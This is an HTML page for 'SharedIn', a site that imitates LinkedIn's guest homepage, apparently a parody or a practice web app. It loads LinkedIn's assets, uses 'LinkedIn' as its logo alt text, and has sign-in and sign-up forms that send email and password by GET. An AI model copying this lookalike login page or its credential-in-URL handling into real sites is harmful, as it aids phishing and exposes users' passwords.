<head>

 <link rel="stylesheet" type="text/css" href="https://static.licdn.com/scds/concat/common/css?h=3bifs78lai5i0ndyj1ew7316e-9itxa6zyjvg22zg8x43bjie3o-2it1to3q1pt5evainys9ta07p-4uu2pkz5u0jch61r2nhpyyrn8-6vwzw0ipx7zafkp38dk7h9vf7-7poavrvxlvh0irzkbnoyoginp-4om4nn3a2z730xs82d78xj3be-16do2fwrv2laqdi1lpod1pt4s-ct4kfyj4tquup0bvqhttvymms-cxff0g818hf3ks7dzixd4lqcq&amp;fc=1">

 <link rel="stylesheet" type="text/css" href="https://static.licdn.com/scds/concat/common/css?h=bsmsbj94a1whpq3bph6eagrtu-8k6r9c0fn6s2zy3aofnyobher-339m0bwob0kpb2pqrha0dlx1j-b9mymey6ad7p3ka7rkucutgnb-npu3qknrq9dxl9o7lthiox77&amp;fc=1">

  <script type="text/javascript">
    LI.JSContentBasePath = "https://static.licdn.com/scds/concat/common/js?v=build-1191_1_32127-prod&fc=1";
    LI.CSSContentBasePath = "https://static.licdn.com/scds/concat/common/css?v=build-1191_1_32127-prod&fc=1";
    LI.injectRelayHtmlUrl = "https://static.licdn.com/scds/common/u/lib/inject/0.4.2/relay.html";
    LI.injectRelaySwfUrl = "https://static.licdn.com/scds/common/u/lib/inject/0.4.2/relay.swf";
    LI.comboBaseUrl = "https://static.licdn.com/scds/concat/common/css?v=build-1191_1_32127-prod&fc=1";
    LI.staticUrlHashEnabled = "true";
  </script>
</head>

<body class="en guest v2 new-ghome login-in-header chrome-v5 chrome-v5-responsive sticky-bg guest" id="pagekey-guest-home">

<div id="header">
  <div class="container">
    <h1><img src="assets/sharedin_logo.png" alt="LinkedIn" class="logo" height="32" width="132"></h1>
    <p class="textad"></p>
    <div class="login">
        <form action="uas/index" method="GET" name="login" novalidate="novalidate" id="login" class="ajax-form" data-jsenabled="check">
        <input type="hidden" name="isJsEnabled" value="false"/>
        <input type="hidden" name="source_app" value=""/>
        <fieldset>
          <legend>Sign In</legend>
            <ul>
                <li>
                  <label for="session_key-login" >Email address</label>

                  <div class="fieldgroup">
                    <span class="error" id="session_key-login-error"></span>
                    <input type="text" name="session_key" value="" id="session_key-login" autofocus tabindex="1" size="27" data-ime-mode-disabled>
                  </div>
                </li>
                <li>
                  <label for="session_password-login" >Password</label>
                  <div class="fieldgroup">
                    <span class="error" id="session_password-login-error"></span>
                    <input type="password" name="session_password" value="" id="session_password-login" tabindex="2" size="27">
                  </div>
                </li>
              <li class="button">
                <input type="submit" name="signin" value="Sign In" id="signin" tabindex="3" class="btn-secondary">
              </li>
            </ul>
          <script id="control-http-12109-2431804-1" type="linkedin/control" class="li-control">
            LI.Controls.addControl('control-http-12109-2431804-1', 'Login', {
            autoFocus: true,
            disableSubmit: true,
            submitId: 'signin'
          });
          </script>
        </fieldset>
        </form>
    </div>
  </div>
</div>


<div id="main-wrapper">
  <div id="main">

    <header>
      <div id="content">
        <h2><span class="text-gradient"></span><span class="headline"><script>utmx_section("Headline")</script>
        Get to know each other better.
        </noscript></span></h2>
      </div>
    </header>


    <section>
        <div class="leo-module mod-feat jointoday" >

        <div align="center" width="700px" float="left">
          <img src="https://static.licdn.com/scds/common/u/images/apps/home/guesthome/ghp_international_3_150x150_v1.png" width="150" height="150" alt="Male Headshot" >


          <div id="content">
            <h2><p>"Today's King of SharedIn"</p>
            </noscript></span></h2>
          </div>

          <div id="content">
            <h2><span class="text-gradient"></span><span class="headline"><script>utmx_section("Headline")</script>
            Ming Li </h2>
            </noscript></span>
          </div>

          <p><br><strong> with 100 connections </strong></p>
        </div>

      </div>
    </section>


    <section>
      <div class="leo-module mod-feat jointoday" id="module-id3" >
        <div class="header"><h2><script>utmx_section("Tagline")</script>Get started &ndash; it&rsquo;s free.</noscript></h2></div>
      <div class="content">

      <p><br></p>

        <form action="/nhome/create" method="GET" name="coldRegistrationForm" novalidate="novalidate" class="feature" data-jsenabled="check">
            <input type="hidden" name="isJsEnabled" value="false"/>

            <fieldset>
              <legend>Sign Up</legend>
              <ul>
                  <li id="first-name">

                        <label for="firstName-coldRegistrationForm" >First name</label>


          <script id="control-http-12109-2431804-3" type="linkedin/control" class="li-control">
            LI.Controls.addControl('control-http-12109-2431804-3', 'GhostLabel', {});
          </script>


                       <span class="error" id="firstName-coldRegistrationForm-error"></span>
                      <div class="fieldgroup">
                          <input type="text" name="firstName" value="" id="firstName-coldRegistrationForm" autocomplete="on" size="55" maxlength="20" tabindex="5">
                      </div>
                  </li>
                  <li id="last-name">

                        <label for="lastName-coldRegistrationForm" >Last name</label>

          <script id="control-http-12109-2431805-4" type="linkedin/control" class="li-control">


            LI.Controls.addControl('control-http-12109-2431805-4', 'GhostLabel', {});
          </script>


                      <span class="error" id="lastName-coldRegistrationForm-error"></span>
                      <div class="fieldgroup">
                        <input type="text" name="lastName" value="" id="lastName-coldRegistrationForm" autocomplete="on" size="55" maxlength="40" tabindex="6">
                      </div>
                  </li>
                <li id="email-address">

                      <label for="email-coldRegistrationForm" >Email address</label>

          <script id="control-http-12109-2431805-5" type="linkedin/control" class="li-control">
            LI.Controls.addControl('control-http-12109-2431805-5', 'GhostLabel', {});
          </script>


                    <span class="error" id="email-coldRegistrationForm-error"></span>
                    <div class="fieldgroup">
                      <input type="email" name="email" value="" id="email-coldRegistrationForm" type="email" autocomplete="on" size="55" maxlength="128" tabindex="7" data-ime-mode-disabled>
                    </div>
                </li>
                <li id="password">

                          <label for="password-coldRegistrationForm" >Password (6 or more characters)</label>

          <script id="control-http-12109-2431805-6" type="linkedin/control" class="li-control">


            LI.Controls.addControl('control-http-12109-2431805-6', 'GhostLabel', {});
          </script>


                    <span class="error" id="password-coldRegistrationForm-error"></span>
                    <div class="fieldgroup">
                      <input type="password" name="password" value="" id="password-coldRegistrationForm" tabindex="8">
                    </div>
                </li>
              </ul>
                <input type="hidden" name="trk" value="guest_home_login"/>
              <div class="form-bottom-row">
                    <p class="policy">
                    </p>
                    <p class="action">
                       <script>utmx_section("JoinNow-Button")</script><input type="submit" name="" value="Join now" id="btn-submit" class="btn-action" tabindex="9"></noscript>
                    </p>
              </div>
            </fieldset>
            <div class="progress-indicator"></div>




          <input type="hidden" name="webmailImport" value="false" id="webmailImport-coldRegistrationForm"><input type="hidden" name="trcode" value="" id="trcode-coldRegistrationForm"><input type="hidden" name="genie-reg" value="" id="genie-reg-coldRegistrationForm"><input type="hidden" name="mod" value="" id="mod-coldRegistrationForm"><input type="hidden" name="regCsrfParam" value="a366a56c-a74b-4dfb-8f1c-4e94f491d2a6" id="regCsrfParam-coldRegistrationForm"><input type="hidden" name="csrfToken" value="ajax:6238021195953821329" id="csrfToken-coldRegistrationForm"><input type="hidden" name="sourceAlias" value="0_2Ru1i2uo3MoRjeCeicT3Nl" id="sourceAlias-coldRegistrationForm">
          </form>

          <script id="control-http-12109-2431805-7" type="linkedin/control" class="li-control">
            LI.Controls.addControl('control-http-12109-2431805-7', 'RegisterForm', {});
          </script>

    </div></div>
  </section>

  </div>
</div>


  <footer id="guestfooter">
    <div id="ghome-footer">
      <div id="search-browse">
        <div id="search">
          <form name="searchForm" action="/pub/dir" method="get">
            <h3>Find a tag:</h3>
            <ul>
                  <li>


              <script id="control-http-12109-2431806-8" type="linkedin/control" class="li-control">


            LI.Controls.addControl('control-http-12109-2431806-8', 'GhostLabel', {});
          </script>


                    <input type="text" name="tagname" id="first" size="185" />
                  </li>
           </ul>
            <p class="action"><input class="btn-secondary" type="submit" name="search" value="Search"/></p>
          </form>
        </div>

        <div id="footer">
         <div class="wrapper" align="center">

         <ul id="nav-legal">
         <li><p id="copyright" class="guest">SharedIn <em>© 2014</em></p></li>
         <li><a href="#" target="_blank" rel="nofollow">Community</a></li>
         <li><a href="#">About us</a></li>
         <li class="last"><a href="#">Contact</a></li>

         </ul>


         </div>
        </div>




      </div>
    </div>
</footer>


</body>
